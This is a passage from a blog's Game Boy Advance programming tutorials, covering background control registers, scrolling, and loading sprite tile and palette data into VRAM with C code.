<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>BG</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Size (defined below)</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">D</td>
<td>Ignored today (see <a href="http://www.coranac.com/tonc/text/regbg.htm">Tonc</a> for info)</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">CBA98</td>
<td>What Screen Block to start at</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">7</td>
<td>Color mode: (1 for 8bpp, 0 for 4bpp)</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">6</td>
<td>Ignored today (see <a href="http://www.coranac.com/tonc/text/regbg.htm">Tonc</a> for info)</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">54</td>
<td>Nothing, empty bits</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">32</td>
<td>Tile Block to use</td>
</tr>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">10</td>
<td>Z Depth</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Just like with Sprites, the sizes for backgrounds use the bits above to select a value from another table, for backgrounds, this table is as follows:</p>
<div align="center">
<table style="border:1px solid black; width=480px; padding:2px;">
<colgroup>
<col width="100px" />
<col width="100px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>Bits</th>
<th> Size (in Tiles)</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>00</td>
<td style="border:1px solid black;">32x32</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">01</td>
<td>64x32</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">10</td>
<td>32x64</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">11</td>
<td>64x64</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Using the above tables, if we wanted to define our first background (the checkerboard), as a 32x32 tile background which uses tiles starting at the first tile block, and uses the second Screen Block (since it’s offset from the start of VRAM to make space for tile memory), we would do the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//Size 00, Screen Block 1, Color Mode 1, Tile Block 0, Depth 0</span>
<span class="c1">//0000 0001 1000 0000</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span></code></pre></figure>
<p>Notice that we want our Z Depth to be 0 as well. The higher this value, the farther back in the drawing order a background is, so a BG at depth 0 will draw on top of backgrounds with any higher values. Since our checkerboard background has the transparent pixels in it, we want it to be drawn on top of whatever will fill in those transparent pixels.</p>
<p>If we put all this together (leaving out the code for the second background), we get:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <string.h>
#include "tiles.h"
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define BACKGROUND_0 0x0100
</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL *((volatile uint32*)(0x04000008))
</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
</span>
<span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//load data</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_BG_PALETTE</span><span class="p">,</span> <span class="n">bgPal</span><span class="p">,</span> <span class="n">bgPalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">bgTiles</span><span class="p">,</span> <span class="n">bgTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">checkerBg</span><span class="p">,</span> <span class="n">checkerBgLen</span><span class="p">);</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span><span class="c1">// 0000 0001 1000 0000;</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And if you run that, you should see:</p>
<div align="center">
<img src="/images/post_images/2017-04-11/bg0.png" /><br />
</div>
<p>Which is excellent! We officially have our first background on the screen. Let’s add our second one now. Remember that we used 2 Screen Blocks to hold all the values for this background, and we want them laid out horizontally, so we’ll have a 64x32 background. We want it to be at priority 0, and use the data we populated with the gradient generating code above.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">// Size 01, Screen Block 2, Color Mode 1, Tile Block 1, Priority 1</span>
<span class="c1">// 0100 0010 1000 0101</span>
<span class="n">REG_BG1_CONTROL</span> <span class="o">=</span> <span class="mh">0x4285</span><span class="p">;</span></code></pre></figure>
<p>If we add the above line, and the required #defines and gradient code to what we have, we get the following (I’ve omitted GenerateGradient() function body for brevity). I promise after this to not paste any more large code blocks into the article :)</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <string.h>
#include "tiles.h"
#include "bg.h"
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define BACKGROUND_0 0x0100
#define BACKGROUND_1 0x0200
</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL *((volatile uint16*)(0x0400000A))
</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
</span>
<span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
#define MEM_PALETTE ((uint16*)(0x05000200))
</span>
<span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">GenerateGradient</span><span class="p">();</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//load data</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_BG_PALETTE</span><span class="p">,</span> <span class="n">bgPal</span><span class="p">,</span> <span class="n">bgPalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">bgTiles</span><span class="p">,</span> <span class="n">bgTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">checkerBg</span><span class="p">,</span> <span class="n">checkerBgLen</span><span class="p">);</span>
<span class="n">GenerateGradient</span><span class="p">();</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span><span class="c1">// 0000 0001 1000 0000;</span>
<span class="n">REG_BG1_CONTROL</span> <span class="o">=</span> <span class="mh">0x4285</span><span class="p">;</span> <span class="c1">// 0100 0010 1000 0101</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">BACKGROUND_1</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you compile and run the above (filling in the GenerateGradient function), you should end up with this:</p>
<div align="center">
<img src="/images/post_images/2017-04-11/bg1.png" /><br />
</div>
<p>Which is almost exactly what we wanted to end up with when we started! All that’s left is to add some movement, and this is pretty easy to do:</p>
<h2 id="moving-things-around">Moving Things Around</h2>
<p>In truth, backgrounds don’t really move, your viewport moves over top of the background. This makes sense with 1 background, but it gets a bit abstract when you think about multiple backgrounds moving at once. In essence, all you have to keep in mind is that increasing the X value of the background scrolling register is going to move it to the left, because what you’re doing is actually moving where your screen is to the right. The same is true for the vertical scrolling register.</p>
<p>As you may have guessed from that explanation, each background on the GBA has two additional registers, one for X offset, and one for Y offset. All backgrounds will repeat infinitely as you scroll them, so you can keep incrementing these values at will, without worrying about resetting them when you get to the edge of a background image. These registers are defined as follows:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_BG0_SCROLL_H *((volatile uint16*)(0x04000010))
#define REG_BG0_SCROLL_V *((volatile uint16*)(0x04000012))
#define REG_BG1_SCROLL_H *((volatile uint16*)(0x04000014))
#define REG_BG1_SCROLL_V *((volatile uint16*)(0x04000016))
#define REG_BG2_SCROLL_H *((volatile uint16*)(0x04000018))
#define REG_BG2_SCROLL_V *((volatile uint16*)(0x0400001A))
#define REG_BG2_SCROLL_H *((volatile uint16*)(0x0400001C))
#define REG_BG2_SCROLL_V *((volatile uint16*)(0x0400001E))</span></code></pre></figure>
<p>These are pretty self explanatory, assign numbers to them to make the corresponding background move. The only weird part about them is that they are Write-Only, so you can’t simply increment the value in one of the registers, nor can you ever read the value in the register, you can just write to it.</p>
<p>Using these registers, it’s trivial to modify our code from earlier to make things scroll. For brevity’s sake, I’m just going to show how to modify the while(1){} section from the above code, rather than paste the whole thing again:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="n">hScroll</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">h2Scroll</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">REG_BG0_SCROLL_H</span> <span class="o">=</span> <span class="o">-</span><span class="n">hScroll</span><span class="p">;</span>
<span class="n">REG_BG1_SCROLL_H</span> <span class="o">=</span> <span class="n">h2Scroll</span><span class="p">;</span>
<span class="n">h2Scroll</span> <span class="o">+=</span><span class="mi">2</span><span class="p">;</span>
<span class="n">hScroll</span> <span class="o">=</span> <span class="n">h2Scroll</span><span class="o">/</span><span class="mi">3</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>This is pretty much what you’d expect, background 0 is being assigned a value that is decreasing, which means it should appear to be moving right on the screen (since our viewport is moving left), and vice versa with the gradient background. This matches up with the scroll directions we had at the top of the post. Which is perfect, because that means we’re done!</p>
<h2 id="conclusion">Conclusion</h2>
<p>I suppose I should link you to some tools that can be used to create backgrounds, but I do so only grudgingly, because I don’t think they’re great. Tonc suggests <a href="http://www.tilemap.co.uk/mappy.php">Mappy</a> and <a href="http://nessie.gbadev.org/">MapEd</a>. To be fair, I haven’t written a tile mapping tool so I don’t really have much of a leg to stand on when criticizing these, but I found them rather fiddly to use, which is why I ended up just hand building some really simple ones for this post.</p>
<p>I’d love to hear about better tools for doing this sort of work. I think <a href="http://www.mapeditor.org/">Tiled</a> might be better, but I don’t know how set up it is for GBA style stuff. In any case, I’d love to hear about what tools might be better <a href="https://twitter.com/khalladay">on Twitter</a>. See you next week!</p>
GBA By Example - Drawing and Moving Sprites2017-04-04T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/04/04/GBA-By-Example-2<p>(Note: This is Part 2 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p><a href="http://kylehalladay.com/blog/tutorial/2017/03/28/GBA-By-Example-1.html">Last week</a>, we were working in video mode 3, which is one of the “bitmap” video modes. These modes are named so because they use the GBA’s 96K of video memory (VRAM) to store a representation of the screen as an array of colour values. If you want to draw to pixel (0,0), you simply set the first element in the screen buffer array to the colour you want, and when the hardware draws, it reads the value at that location, and draws it to the screen.</p>
<p>While some games did use the bitmap modes to do some pretty amazing stuff (like <a href="http://www.ign.com/games/james-bond-007-nightfire/gba-497891">James Bond 007: NightFire</a> and <a href="http://www.ign.com/games/stuntman/gba-550094">Stuntman</a>), they were the exception, not the rule. Most GBA games that were released were purely 2D, and used what are called Tiled Video Modes, which provide hardware level optimizations for 2D drawing tasks.</p>
<p>So today I’m going to walk through the bare minimum needed to use one of these tiled video modes to draw (and move) a sprite across the screen, which might end up looking like this:</p>
<div align="center">
<img src="/images/post_images/2017-04-04/preview.gif" style="width:240px;height:160px" />
<font size="2">(Forgive the Programmer Art)</font><br /><br />
</div>
<p>Let’s get started!</p>
<h2 id="introducing-tiled-video-modes">Introducing Tiled Video Modes</h2>
<p>Tiled video modes are different from the bitmap modes because they don’t store large colour arrays in VRAM. Instead, VRAM is used to store collections of tiles (8x8 collections of colour values), and data about how to display these tiles. There are 3 different tiled video modes (mode 0 - mode 2), but I don’t really know enough right now to worry about the differences between them right now to make an informed choice about which one to use. Until that changes, I’m going to work in Mode 0 and kinda plug my ears and try not to think too hard about it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//mode 0, no background enabled</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">){}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Since what we store in VRAM has changed since last week, it makes sense that there are a few new data structures that we’re going to have to understand in order to get anything useful into memory (and do anything interesting).</p>
<p>As mentioned, a <em>Tile</em> is an 8x8 collection of colour values (stored linearly, one row after the other), but these colour values are not the colours the sprite will actually use on screen. Instead, these values are used to look up the colour in a <em>Palette</em>, which is another data structure we’re going to have to wrangle today.</p>
<p>A <em>Palette</em> is a block of memory that contains colour values, plain and simple. An application gets 2 of these blocks of memory, one for backgrounds, and one for sprites. Each section is large enough to contain 256 colour values.</p>
<p>Tiles can take the form of 8bpp (bits per pixel), or 4bpp. 8bpp mode is pretty straightforward - we have 8 bits to play with, which means each value in our tile can be one of 256 possible values, which is exactly how many values we can store in a palette. In 4bpp mode, we get up to 16 possible values for each pixel, which means that we can only use a section of our palette memory for each sprite.</p>
<p>Because it sounds easier, and I promised that this article was the bare minimum we needed to draw a sprite, we’re going to use 8bpp today.</p>
<p>Finally, a Sprite is a rectangular collection of tiles, so when we format images to be used on the GBA, we need to break them up into 8x8 tiles, and a palette of colours that those tiles use, and then provide some data about which locations in Tile and Palette memory our sprite will use. It’s important to note that the GBA calls Sprites “Objects” (not the OOP kind). You can split hairs about this, but a GBA Object is a collection of tiles, arranged rectangularly, that move around the screen. Sounds like a Sprite to me.</p>
<p>I’m sure there are reasons why this isn’t true 100% of the time, but those reasons aren’t really important today.</p>
<p>So to wrap this section up:</p>
<ul>
<li>A Palette is an array of 256 colour values</li>
<li>A Tile’s colour values are actually indices into Palette memory</li>
<li>A Sprite is a (theoretical) rectangular collection of tiles.</li>
<li>The hardware equivalent of a Sprite is called an Object</li>
</ul>
<p><br />
Hopefully that’s all relatively clear! Let’s start putting all of this together</p>
<h2 id="working-with-sprite-data">Working With Sprite Data</h2>
<p>The first thing we need to do is to actually have some tile and colour data to use in our program.</p>
<p>For this section, I’m going to simply provide the data that we’re going to use. At the end of this post, I’ll link you to tools that you can use to make your own. To start with, let’s consider a really simple sprite, which consists of only a single tile, and 3 palette colours.</p>
<div align="center">
<img src="/images/post_images/2017-04-04/testsprite.png" />
<font size="2">(Grid lines added to help differentiate pixels, not included in sprite)</font><br /><br />
</div>
<p>Here’s what that sprite might look like in our program:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">testTiles</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000001</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x02020102</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">testPal</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x03E0001F</span><span class="p">,</span><span class="mh">0x00007C00</span><span class="p">,</span>
<span class="p">};</span></code></pre></figure>
<p>You can see that most of this is what we would expect, the testTiles data traverses each row in order from top to bottom, with each tile index getting 8 bits (2 hex numbers) of data allocated, so each 32 bit value represents 4 pixels. The lowest bits represent the leftmost pixels, which makes sense logically, even if it makes things harder to read when you’re looking at hex values.</p>
<p>The palette data is also as we would expect, containing the three colours used in our sprite, represented as 15 bit colours, with 2 colours per 32 bit value.</p>
<p>The <strong>attribute</strong>((aligned(4))) is a gcc macro to force your data to be aligned on 4 byte boundaries. I took it straight from the <a href="http://www.coranac.com/tonc/text/regobj.htm">Tonc tutorial</a>, which says:</p>
<blockquote>
<p>As of devkitARM r19, there are new rules on struct alignments, which means that structs may not always be word aligned, and in the case of OBJ_ATTR structs (and others), means that [some] struct-copies … will not only be slow, they may actually break. For that reason, I will force word-alignment on many of my structs…</p>
</blockquote>
<p>Since I don’t know enough to argue with that right now, I’m taking it on faith that this is still a good idea.</p>
<p>Now that we know what our sprite data is going to look like, let’s use a slightly larger data set. This is mostly to make sure that what we do later is correctly ordering the tiles in our sprite. If we used the example data above, we wouldn’t be able to verify this because we only had 1 tile. Here’s the sprite and data that I’m going to be using for the rest of the article:</p>
<div align="center">
<img src="/images/post_images/2017-04-04/realsprite.png" /><br />
</div>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spriteTiles</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01010000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01010100</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span>
<span class="mh">0x01000000</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010000</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010100</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span>
<span class="mh">0x00000003</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000303</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00030303</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00000003</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00000303</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00030303</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span>
<span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04040400</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04040000</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04000000</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04040400</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04040000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04000000</span><span class="p">,</span>
<span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00020202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00000202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00000002</span><span class="p">,</span>
<span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00020202</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000202</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000002</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spritePal</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x001E0000</span><span class="p">,</span><span class="mh">0x03E07FFF</span><span class="p">,</span><span class="mh">0x00007C1F</span><span class="p">,</span>
<span class="p">};</span></code></pre></figure>
<p>If you take a look at this larger sprite data, you’ll notice that it’s stored as a sequential array of 8x8 tiles, that is, the 3rd 32 bit value isn’t the first four pixels of the top right tile, it’s the first four pixels of the second row of the top left tile. This is to make things easier to get into VRAM, since we have to upload tiles, not whole images. Mercifully, there’s a command line tool that I’ll link later that will convert images to this format for us, so we don’t have to try to author images like this.</p>
<p>For readability sake, I’m going to put the above block of code into it’ own .c file, that I’m going to call sprite.c. I’m also going to create sprite.h, which looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#ifndef SPRITE_H
#define SPRITE_H
</span>
<span class="cp">#define spriteTilesLen 256 //size in bytes
</span><span class="k">extern</span> <span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spriteTiles</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="cp">#define spritePalLen 12
</span><span class="k">extern</span> <span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spritePal</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
<span class="cp">#endif</span></code></pre></figure>
<p>I’m using 32 bit values to store everything, because when I tried to use 16 bit values, I ended up needing to pad my sizes in the header to the nearest multiple of 8 (so spritePalLen had to be 16), or else some data wouldn’t transfer. I’m not entirely sure why that is (or why making things ints fixed that), but I decided I’d rather not have to remember to do that, and chose to stick with 32 bit values even though they make the data slightly harder to read.</p>
<h2 id="getting-all-this-into-vram">Getting All This Into VRAM</h2>
<p>We have sprite data and palette data ready to go, but as we discussed earlier, we’re going to need to get this data into the proper parts of memory. Specifically, we’ll need to add the palette values to our larger 256 colour palette memory, upload tile data to tile memory, and then create a sprite that references those tiles.</p>
<p>Let’s start with the palette memory:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "sprite.h"
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="cp">#define MEM_PALETTE ((uint16*)(0x05000200))
</span><span class="kt">void</span> <span class="nf">UploadPaletteMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">spritePal</span><span class="p">,</span> <span class="n">spritePalLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This is pretty straightforward, the only thing to note is that in other articles, what I’m calling MEM_PALETTE here is usually called MEM_OBJ_PAL, or something similar. This is because palette memory on the GBA is divided into two sections, but we’re only using one of them today, so for simplicity’s sake, I’m just calling it MEM_PALETTE and pretending that’s all there is to it.</p>
<p>Next we need to upload our tile memory, this is a bit less straightforward:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="n">uint32</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x06000000)
#define MEM_TILE ( (TileBlock*)MEM_VRAM )
</span>
<span class="kt">void</span> <span class="nf">UploadTileMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">spriteTiles</span><span class="p">,</span> <span class="n">spriteTilesLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>To understand what’s going on here, we need to know a bit more about how tiles are stored in VRAM. In tiled video modes, VRAM is used to store tile data, and that data is arranged in 16kb blocks, called “tile blocks” or (more confusingly) “charblocks.” Since the GBA has 96kb of VRAM, this gives us 6 tile blocks total.</p>
<p>The first four of these tile blocks are reserved for backgrounds (which we aren’t delving into today), and the remainder are for tiles. This means that when we want to put a tile into memory, the first possible memory slot for us is at MEM_VRAM + 64k bytes (or really, + 65536 bytes because of data alignment). This gives us a memory address of 0x6010000, but it’s much easier to get at individual tile addresses using the structs / array notation you see here.</p>
